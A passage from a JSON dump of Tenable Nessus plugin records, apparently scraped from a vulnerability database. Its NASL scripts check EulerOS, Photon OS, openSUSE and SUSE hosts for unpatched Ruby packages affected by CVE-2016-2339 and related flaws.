to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-05-01T00:00:00", "type": "nessus", "title": "EulerOS 2.0 SP1 : ruby (EulerOS-SA-2017-1050)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-3900", "CVE-2016-2337", "CVE-2016-2339"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:ruby", "p-cpe:/a:huawei:euleros:ruby-irb", "p-cpe:/a:huawei:euleros:ruby-libs", "p-cpe:/a:huawei:euleros:rubygem-bigdecimal", "p-cpe:/a:huawei:euleros:rubygem-io-console", "p-cpe:/a:huawei:euleros:rubygem-json", "p-cpe:/a:huawei:euleros:rubygem-psych", "p-cpe:/a:huawei:euleros:rubygem-rdoc", "p-cpe:/a:huawei:euleros:rubygems", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2017-1050.NASL", "href": "https://www.tenable.com/plugins/nessus/99895", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99895);\n script_version(\"1.17\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2015-3900\",\n \"CVE-2016-2337\",\n \"CVE-2016-2339\"\n );\n script_bugtraq_id(\n 75482\n );\n\n script_name(english:\"EulerOS 2.0 SP1 : ruby (EulerOS-SA-2017-1050)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the versions of the ruby packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerabilities :\n\n - An exploitable heap overflow vulnerability exists in\n the Fiddle::Function.new 'initialize' function\n functionality of Ruby. In Fiddle::Function.new\n 'initialize' heap buffer 'arg_types' allocation is made\n based on args array length. Specially constructed\n object passed as element of args array can increase\n this array size after mentioned allocation and cause\n heap overflow.(CVE-2016-2339)\n\n - Type confusion exists in _cancel_eval Ruby's TclTkIp\n class method. Attacker passing different type of object\n than String as 'retval' argument can cause arbitrary\n code execution.(CVE-2016-2337)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2017-1050\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b233fe7d\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected ruby packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/01\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ruby-irb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:ruby-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:rubygem-bigdecimal\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:rubygem-io-console\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:rubygem-json\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:rubygem-psych\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:rubygem-rdoc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:rubygems\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(1)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP1\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"ruby-2.0.0.353-23.h4\",\n \"ruby-irb-2.0.0.353-23.h4\",\n \"ruby-libs-2.0.0.353-23.h4\",\n \"rubygem-bigdecimal-1.2.0-23.h4\",\n \"rubygem-io-console-0.4.2-23.h4\",\n \"rubygem-json-1.7.7-23.h4\",\n \"rubygem-psych-2.0.0-23.h4\",\n \"rubygem-rdoc-4.0.0-23.h4\",\n \"rubygems-2.0.14-23.h4\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"1\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-20T14:40:00", "description": "An update of [ruby] packages for PhotonOS has been released.", "cvss3": {}, "published": "2018-08-17T00:00:00", "type": "nessus", "title": "Photon OS 1.0: Ruby PHSA-2017-0002 (deprecated)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2339"], "modified": "2019-02-07T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:ruby", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2017-0002.NASL", "href": "https://www.tenable.com/plugins/nessus/111851", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2/7/2019\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2017-0002. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111851);\n script_version(\"1.2\");\n script_cvs_date(\"Date: 2019/02/07 18:59:50\");\n\n script_cve_id(\"CVE-2016-2339\");\n\n script_name(english:\"Photon OS 1.0: Ruby PHSA-2017-0002 (deprecated)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"This plugin has been deprecated.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of [ruby] packages for PhotonOS has been released.\");\n # https://github.com/vmware/photon/wiki/Security-Updates-18\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?a9d89ba7\");\n script_set_attribute(attribute:\"solution\", value:\"n/a.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-2339\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\nexit(0, \"This plugin has been deprecated.\");\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\npkgs = [\n \"ruby-2.4.0-1.ph1\",\n \"ruby-debuginfo-2.4.0-1.ph1\"\n];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"PhotonOS-1.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:26:19", "description": "An update of the ruby package has been released.", "cvss3": {}, "published": "2019-02-07T00:00:00", "type": "nessus", "title": "Photon OS 1.0: Ruby PHSA-2017-0002", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-2339"], "modified": "2019-02-07T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:ruby", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2017-0002_RUBY.NASL", "href": "https://www.tenable.com/plugins/nessus/121666", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2017-0002. The text\n# itself is copyright (C) VMware, Inc.\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(121666);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2019/02/07\");\n\n script_cve_id(\"CVE-2016-2339\");\n\n script_name(english:\"Photon OS 1.0: Ruby PHSA-2017-0002\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the ruby package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-18.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2016-2339\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/01/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/01/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/02/07\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:ruby\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:1.0\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 1\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 1.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"PhotonOS\", cpu);\n\nflag = 0;\n\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ruby-2.4.0-1.ph1\")) flag++;\nif (rpm_check(release:\"PhotonOS-1.0\", reference:\"ruby-debuginfo-2.4.0-1.ph1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ruby\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:12:57", "description": "This ruby2.1 update to version 2.1.9 fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2016-2339: heap overflow vulnerability in the Fiddle::Function.new'initialize' (bsc#1018808)\n\n - CVE-2015-7551: Unsafe tainted string usage in Fiddle and DL (bsc#959495)\n\n - CVE-2015-3900: hostname validation does not work when fetching gems or making API requests (bsc#936032)\n\n - CVE-2015-1855: Ruby'a OpenSSL extension suffers a vulnerability through overly permissive matching of hostnames (bsc#926974)\n\n - CVE-2014-4975: off-by-one stack-based buffer overflow in the encodes() function (bsc#887877)\n\nBugfixes :\n\n - SUSEconnect doesn't handle domain wildcards in no_proxy environment variable properly (bsc#1014863)\n\n - Segmentation fault after pack & ioctl & unpack (bsc#909695)\n\n - Ruby:HTTP Header injection in 'net/http' (bsc#986630)\n\nChangeLog :\n\n- http://svn.ruby-lang.org/repos/ruby/tags/v2_1_9/ChangeLog\n\nThis update was imported from the SUSE:SLE-12:Update update project.", "cvss3": {}, "published": "2017-05-01T00:00:00", "type": "nessus", "title": "openSUSE Security Update : ruby2.1 (openSUSE-2017-527)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4975", "CVE-2015-1855", "CVE-2015-3900", "CVE-2015-7551", "CVE-2016-2339"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libruby2_1-2_1", "p-cpe:/a:novell:opensuse:libruby2_1-2_1-debuginfo", "p-cpe:/a:novell:opensuse:ruby2.1", "p-cpe:/a:novell:opensuse:ruby2.1-debuginfo", "p-cpe:/a:novell:opensuse:ruby2.1-debugsource", "p-cpe:/a:novell:opensuse:ruby2.1-devel", "p-cpe:/a:novell:opensuse:ruby2.1-devel-extra", "p-cpe:/a:novell:opensuse:ruby2.1-doc-ri", "p-cpe:/a:novell:opensuse:ruby2.1-stdlib", "p-cpe:/a:novell:opensuse:ruby2.1-stdlib-debuginfo", "cpe:/o:novell:opensuse:42.1", "cpe:/o:novell:opensuse:42.2"], "id": "OPENSUSE-2017-527.NASL", "href": "https://www.tenable.com/plugins/nessus/99753", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2017-527.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99753);\n script_version(\"3.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-4975\", \"CVE-2015-1855\", \"CVE-2015-3900\", \"CVE-2015-7551\", \"CVE-2016-2339\");\n\n script_name(english:\"openSUSE Security Update : ruby2.1 (openSUSE-2017-527)\");\n script_summary(english:\"Check for the openSUSE-2017-527 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This ruby2.1 update to version 2.1.9 fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2016-2339: heap overflow vulnerability in the\n Fiddle::Function.new'initialize' (bsc#1018808)\n\n - CVE-2015-7551: Unsafe tainted string usage in Fiddle and\n DL (bsc#959495)\n\n - CVE-2015-3900: hostname validation does not work when\n fetching gems or making API requests (bsc#936032)\n\n - CVE-2015-1855: Ruby'a OpenSSL extension suffers a\n vulnerability through overly permissive matching of\n hostnames (bsc#926974)\n\n - CVE-2014-4975: off-by-one stack-based buffer overflow in\n the encodes() function (bsc#887877)\n\nBugfixes :\n\n - SUSEconnect doesn't handle domain wildcards in no_proxy\n environment variable properly (bsc#1014863)\n\n - Segmentation fault after pack & ioctl & unpack\n (bsc#909695)\n\n - Ruby:HTTP Header injection in 'net/http' (bsc#986630)\n\nChangeLog :\n\n- http://svn.ruby-lang.org/repos/ruby/tags/v2_1_9/ChangeLog\n\nThis update was imported from the SUSE:SLE-12:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://svn.ruby-lang.org/repos/ruby/tags/v2_1_9/ChangeLog\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1014863\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1018808\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=887877\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=909695\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=926974\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=936032\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=959495\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=986630\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected ruby2.1 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libruby2_1-2_1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libruby2_1-2_1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.1-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.1-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.1-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.1-devel-extra\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.1-doc-ri\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.1-stdlib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ruby2.1-stdlib-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:42.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/04/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/01\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE42\\.1|SUSE42\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"42.1 / 42.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libruby2_1-2_1-2.1.9-10.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"libruby2_1-2_1-debuginfo-2.1.9-10.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.1-2.1.9-10.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.1-debuginfo-2.1.9-10.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.1-debugsource-2.1.9-10.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.1-devel-2.1.9-10.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.1-devel-extra-2.1.9-10.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.1-doc-ri-2.1.9-10.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.1-stdlib-2.1.9-10.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.1\", reference:\"ruby2.1-stdlib-debuginfo-2.1.9-10.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libruby2_1-2_1-2.1.9-8.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"libruby2_1-2_1-debuginfo-2.1.9-8.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.1-2.1.9-8.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.1-debuginfo-2.1.9-8.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.1-debugsource-2.1.9-8.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.1-devel-2.1.9-8.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.1-devel-extra-2.1.9-8.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.1-doc-ri-2.1.9-8.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.1-stdlib-2.1.9-8.3.2\") ) flag++;\nif ( rpm_check(release:\"SUSE42.2\", reference:\"ruby2.1-stdlib-debuginfo-2.1.9-8.3.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libruby2_1-2_1 / libruby2_1-2_1-debuginfo / ruby2.1 / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:12:10", "description": "This ruby2.1 update to version 2.1.9 fixes the following issues:\nSecurity issues fixed :\n\n - CVE-2016-2339: heap overflow vulnerability in the Fiddle::Function.new'initialize' (bsc#1018808)\n\n - CVE-2015-7551: Unsafe tainted string usage in Fiddle and DL (bsc#959495)\n\n - CVE-2015-3900: hostname validation does not work when fetching gems or making API requests (bsc#936032)\n\n - CVE-2015-1855: Ruby'a OpenSSL extension suffers a vulnerability through overly permissive matching of hostnames (bsc#926974)\n\n - CVE-2014-4975: off-by-one stack-based buffer overflow in the encodes() function (bsc#887877) Bugfixes :\n\n - SUSEconnect doesn't handle domain wildcards in no_proxy environment variable properly (bsc#1014863)\n\n - Segmentation fault after pack & ioctl & unpack (bsc#909695)\n\n - Ruby:HTTP Header injection in 'net/http' (bsc#986630) ChangeLog :\n\n- http://svn.ruby-lang.org/repos/ruby/tags/v2_1_9/ChangeLog\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2017-04-21T00:00:00", "type": "nessus", "title": "SUSE SLED12 / SLES12 Security Update : ruby2.1 (SUSE-SU-2017:1067-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-4975", "CVE-2015-1855", "CVE-2015-3900", "CVE-2015-7551", "CVE-2016-2339"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libruby2_1", "p-cpe:/a:novell:suse_linux:libruby2_1-2_1-debuginfo", "p-cpe:/a:novell:suse_linux:ruby2.1", "p-cpe:/a:novell:suse_linux:ruby2.1-debuginfo", "p-cpe:/a:novell:suse_linux:ruby2.1-debugsource", "p-cpe:/a:novell:suse_linux:ruby2.1-stdlib", "p-cpe:/a:novell:suse_linux:ruby2.1-stdlib-debuginfo", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2017-1067-1.NASL", "href": "https://www.tenable.com/plugins/nessus/99578", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2017:1067-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(99578);\n 